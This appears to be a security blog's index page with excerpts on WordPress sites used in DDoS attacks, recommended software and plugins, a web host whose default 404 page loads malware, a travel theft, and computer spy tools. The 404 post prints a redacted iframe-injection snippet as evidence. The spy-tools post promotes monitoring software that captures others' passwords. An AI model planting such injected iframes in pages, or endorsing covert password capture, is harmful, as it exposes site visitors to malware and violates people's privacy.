Is your WordPress Site being used to attack others?

Capture d’écran 2014-03-11 à 11.24.19 PM

Capture d’écran 2014-03-11 à 11.24.19 PMPlease check out the Sucuri Scanner Engine to find out if YOUR blog has been used for this massive DDOS : “Lately we are seeing many legitimate and clean WordPress sites being misused on DDOS attacks. We explain in more detail in our blog how it can happen. Example of site being misused: here. If you have any questions, please contact us at labs@sucuri.net or hit us on Twitter – @Sucuri_Security. We will check if it is found in our logs”

Please visit SUCURI’s Engine today !

 

Software Every Computer Should Have

1. Browsers and extensions

  • Firefox – Currently The Best Browser Out There
  • Chrome – A close second
  • Adblock Plus – Blocks Ads
  • ProxTube – Circumvent Blocked Youtube videos.
  • Speed Dial – Allows fast access to your most visited websites.
  • NoScript – Add-on (for Firefox) which allows JavaScript, Java, Flash and other plugins to be executed only by trusted sites.
  • TinEye browser plugin – Reverse search an image.

Continue reading

The Very Best: Wordfence

We run about 40+ websites with WordPress, not including clients and security is always at the forefront of our concerns. We would like to take this opportunity to share with you the absolute best plugin for WordPress: Wordfence.

We have tried and tested so many security plugins, some of which are great at what they do: AntiVirusSucuriScannerTheme Authenticity Checker and much more – however no plugin goes as deeply and thoroughly as WordFence.

Continue reading

Tech Support and the Infinite Typing Monkey Theorem

“Hey Harry, I think this one has got something – To be or not to be, that is the gazorninplat.” – An Infinite Number of Monkeys, Bob Newhart

If you love classic humor, you’ve probably heard this routine by Bob Newhart who imagined the daily routine of human supervisors in charge of an infinite number of monkeys, who according to the celebrated theorem, if given enough time would write all the greats literary works of all time.

Unfortunately, these typing monkeys seem to have found new jobs, mostly with technical support teams at some of America’s top Web Providers. We deal with a number of hosting services and had a bit of a problem of late: a default 404 page that distributes malware.

Our provider, which we shall not name at this point, has many servers one of which hosts over 90K websites. Within this server, is a directory no client can access, it is the /error/ directory, and it is here that a custom 404 page with an iframe that calls up a page from the infamous SearchMagnified site.

document.write('<iframe style="width: 100%; height: 
100%; border: 0;" src="http://******.com/?dn=' 
+ location.hostname + '&pid=******"></iframe>');

Continue reading

The Kitchen Sink

This post will contain some of our latest finds that don’t merit a full article. Some of these links and articles are wonderful resources.

Nightmare in Montreal

Two of us here at WebsiteForensics spent 32 days on a road-trip down to the East Coast of Canada. It was bliss: the people, the places, the food. This is Canada’s best kept secret.

Unfortunately, on our way through Montreal, we thought it would be a great idea to stop by the Atwater Marché for some produce. That’s when it happened: a smash and grab. In just a few minutes, our laptop, cameras, backpacks were stolen. All our pictures had been downloaded to the computer, so there we were with bags of apples and carrots but no pictures from our trip save the 200 or so still on the camera they didn’t manage to steal. What a nightmare.

Continue reading

Computer Spying Tools

Image 3We do not endorse doing anything that is illegal or violates privacy. However there are cases where it is necessary to conduct investigations: parents have the rights and responsibility to monitor their child’s computer usage and employers have the right to monitor activity on their networks and systems. You need a computer spy system.

This is why products are available  as computer spy are available on the market. BrickHouseSecurity.com offers a number of products that give you the ability to monitor networks and machines that fall under your responsibility. This new product will gather passwords, pictures, websites and more even if the end user is not using the administrative account.

Being a computer spy is never to be taken lightly, but you are also responsible for the proper usage of your machines.